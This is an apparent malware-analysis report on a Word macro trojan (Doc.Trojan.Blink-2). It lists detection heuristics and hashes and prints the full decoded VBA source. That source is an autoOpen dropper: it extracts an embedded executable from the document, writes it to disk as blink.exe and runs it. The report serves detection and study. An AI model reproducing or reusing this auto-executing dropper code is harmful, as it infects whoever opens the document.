Verdict: MALICIOUS
Risk Score: 308
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA macro with an autoOpen subroutine, which runs automatically when the document is opened. The macro copies the document to 'blink.doc', reads 8192 bytes from a fixed offset inside that copy, writes them out as an executable named 'blink.exe', and then launches it with Shell. The embedded executable is also detected by ClamAV as Doc.Trojan.Blink-2, indicating a known malicious payload.
Heuristics (7)
- ClamAV: Doc.Trojan.Blink-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Blink-2
- Embedded PE executable (critical, OLE_EMBEDDED_EXE): MZ/PE header found inside document, possible embedded executable
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script: `CloseFile h` / `Shell "blink.exe", 4` / `End Sub`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script: `Sub autoOpen()` / `On Error Resume Next`
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1540 bytes | 1921d50b92241ba66a514b8f61241fb2a45206e1f0fa5febe2908246b6e00e5c | ClamAV: Doc.Trojan.Blink-2; obfuscation or payload: unlikely |
| embedded_office_00007400.exe | embedded-pe | Office MZ+PE at offset 0x7400 | 8192 bytes | dcd63bfe778fb90f62aff754f3361f1ae08ad382808a59c47a3adf6897830cf5 | |

Preview script (first 1,000 lines of the extracted script, macros.bas). The decoded source concatenates two module headers (ThisDocument and Blink); the comment lines marked with a leading `'` followed by `[analysis]` were added by the report editor for readability and are not part of the extracted macro:

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Blink"
'[analysis] Legacy 16-bit-style file APIs (_lopen, _lcreat, _llseek, _lread, _lwrite, _lclose) are aliased to friendlier names.
Private Declare Function OpenFile Lib "kernel32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Sub SeekFile Lib "kernel32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long)
Private Declare Sub ReadFile Lib "kernel32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "kernel32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub CloseFile Lib "kernel32" Alias "_lclose" (ByVal h As Long)

Sub autoOpen()
On Error Resume Next
'BLiNK by ULTRAS[MATRiX]
Dim doc As String, exe As String
Dim h As Long, p As Long
doc = "blink.doc"
exe = "blink.exe"
CopyFileA ActiveDocument.FullName, doc, 0
p = GlobalAlloc(0, 8192)
h = OpenFile(doc, 0)
'[analysis] 29696 = 0x7400, the offset of the carved embedded PE; 8192 bytes matches its size in the artifact table.
SeekFile h, 29696, 0
ReadFile h, p, 8192
CloseFile h
h = CreateFile(exe, 0)
WriteFile h, p, 8192
CloseFile h
Shell "blink.exe", 4
End Sub
```